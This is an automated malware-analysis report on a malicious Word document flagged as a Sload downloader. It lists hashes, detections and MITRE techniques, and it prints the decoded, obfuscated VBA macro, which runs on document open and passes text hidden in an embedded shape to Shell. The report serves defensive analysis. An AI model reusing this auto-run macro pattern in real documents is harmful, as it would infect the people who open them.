Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 76ddd79d0ee84395…

MALICIOUS

Office (OLE)

Size: 78.6 KB
Created: 2018-11-06 19:20:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: 1f9ff6ff0a0a7398da1cb639107c5f70
SHA-1: ee7c0c29ae72eee830a18daa7ee1dfc85b354f40
SHA-256: 76ddd79d0ee84395b6feb5a11b97af610346b95ccd8f4b9a1a2ffd46d3f0e24c
Risk Score: 210

Malware Insights

MITRE ATT&CK
  • T1059.001 PowerShell
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample contains a Document_Open VBA macro that executes a complex PowerShell command. This command decodes a Base64 string, decompresses it, and then executes it using PowerShell. The decoded payload is likely a second-stage downloader, as indicated by the ClamAV detection name 'Doc.Downloader.Sload-6743946-0'. The embedded URL is benign and likely a red herring.

Heuristics (7)

  • ClamAV: Doc.Downloader.Sload-6743946-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Sload-6743946-0
  • Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD)
  • Reference to PowerShell (high, SC_STR_POWERSHELL)
  • LOLBin token sequence in document text (high, SE_LOLBIN_RUN_COMMAND)
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, ...) within 220 characters of a dangerous flag, command verb, or URL. In HTML/PDF/RTF lure bodies this is a visible "run this" instruction; in macro-laden Office files it is the macro's own string-pool entries appearing adjacent in the extracted text.
  • VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Document_Open macro (low, OLE_VBA_DOCOPEN)
    Matched lines in script:
      Attribute VB_Customizable = True
      Private Sub Document_open()
      On Error Resume Next
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1306 bytes
SHA-256: eeae01a79ed1f2164714949f0afb1ae4af1825c2096e438ede231aa6d630175f

Preview of extracted script (first 1,000 lines):
Attribute VB_Name = "iZDtoWhm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
   DZXiQr = (AafHKz + JjSGw * zHPCtd + Wfiaf + JjcpvS + JQQVfN / (kcHFM + CdwJU))
   sZWbZL = WakHfl + mPIunn / (qMwso + WjZwi / sLvspj + NzQpRc + JVGtqY + kBMZik / (QqAmY + smqXTL))
   nZUrEb = obhtWo + jjquX / cTuYdN + djjSV + fGjvZ + DiMIv
   viFQh = (VPIZLo + iHuIjl + CvsXN + AInMr / (GDXPKt + UZZEi + pStzb + XOsXzp))
   HWwFP = FJTfwO + IAHrOX / IwwkR + TzPKwK + pMHjiD + EVmEz
   WpNcv = ahiGsj + OQtcr + zXsGK + iTXOf / Zdqvf + wIAwI + nFsOIz + uHiifi / (CRNODT + iSGYT + jjjKBP + TFTTK * PkPvu + QvJfu)
   ohEmlq = MSOXUh + VQzzu * (iERSX + NCpWB / YGbbOS + cVMwWs)
Const iILfwj = 215064006 - 215064006
Shell@ Shapes(1).TextFrame.TextRange.Text + vfMhziQk + PadmWvN, iILfwj
   cKiLl = sFlzhY + ISzaHl + RLLFh + BIopPr * (jioEi + PRZAI)
   botBiQ = hRIva + zSHKKT * qpqMdC + zjqAJ + fmGBd + RhBzbU
   FIPDZ = (itCRw + iIskQ / (iqFtid + wsWzrK + mbXss + QuJZjN * jzGWhJ + ZdALi))
   cbMtL = (vmCkz + ffnjfM / nMwmz + iFdIb / OGanT + jVGutz)
End Sub